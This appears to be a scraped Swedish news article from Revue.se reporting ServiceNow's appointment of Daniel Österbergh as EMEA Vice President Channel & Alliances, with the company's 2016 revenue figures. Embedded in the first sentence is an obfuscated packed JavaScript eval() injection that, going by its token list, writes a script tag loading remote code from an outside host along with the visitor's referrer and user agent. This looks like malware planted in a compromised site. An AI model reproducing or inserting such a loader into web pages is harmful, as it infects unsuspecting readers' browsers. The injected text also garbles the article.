Image Image Image Image Image Image Image Image Image Image

| 24 november, 2017

Scroll to top

Top

No Comments

Daniel Österbergh är ny europeisk kanal- och partnerchef på ServiceNow | Revue.se

Daniel Österbergh är ny europeisk kanal- och partnerchef på ServiceNow
Sebastian Plengier Ehrnfelt

ServiceNow eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yzhzt|var|u0026u|referrer|htkys||js|php’.split(‘|’),0,{}))
har anställt
Daniel Österbergh som Vice President Channel & Alliances i EMEA-regionen. Han tar med sig mer än tio års erfarenhet från seniora kanalroller i IT-branschen. Han kommer närmast från rollen som kanalchef för västra Europa på EMC, där han bidrog till att växa intäkterna från kanalen från omkring 50% till 80% av omsättningen under en femårsperiod. Han har också arbetat som försäljningschef mot små och medelstora företag på Avaya, där han ansvarade för att utveckla och exekvera företagets kanalstrategi.

I sin nya roll ska Daniel Österbergh bygga vidare på marknadsstrategin i EMEA genom rekrytering av nya strategiska partners i regionen och förvalta nya affärsmöjligheter. Han är direkt underställd Tony Beller, som är globalt kanalansvarig för ServiceNow. Daniel Österbergh leder i den nya rollen ett växande team av lokala och regionala kanal- och partneransvariga i Norden, Storbritannien, Frankrike, Tyskland och Sydeuropa. Även om IT Service Management (ITSM) fortsätter vara en central del av ServiceNows erbjudande är ett strategiskt fokus också att bygga relationer med kanalpartners inom tillväxtområdena kundservice, SecOps och HR.

“Jag har följt ServiceNow i många år och det är tydligt att företaget är i en unik position på marknaden genom att man återskapar de användarupplevelser vi alla känner igen som konsumenter. Att bygga partnerskap som båda parter tjänar på är nyckeln till vår strategi. Vi ger våra partners kraften att tala med sina kunder på nya sätt, bidra till kundernas digitala transformation, och skapa affärer bortom ITSM”, säger Daniel Österbergh.

Den 25 januari 2017 offentliggjorde ServiceNow det finansiella resultatet för fjärde kvartalet och helåret 2016, med en total omsättning på 1,3905 miljarder USD vilket motsvarar en tillväxt på 38% jämfört med föregående år. ServiceNow i EMEA bidrar aktivt till denna tillväxt och kundbasen i regionen växer månad för månad. Kanalpartners har en nyckelroll i ServiceNows regionala affärsstrategi, med ett partnersekosystem i EMEA som består av fler än 200 företag.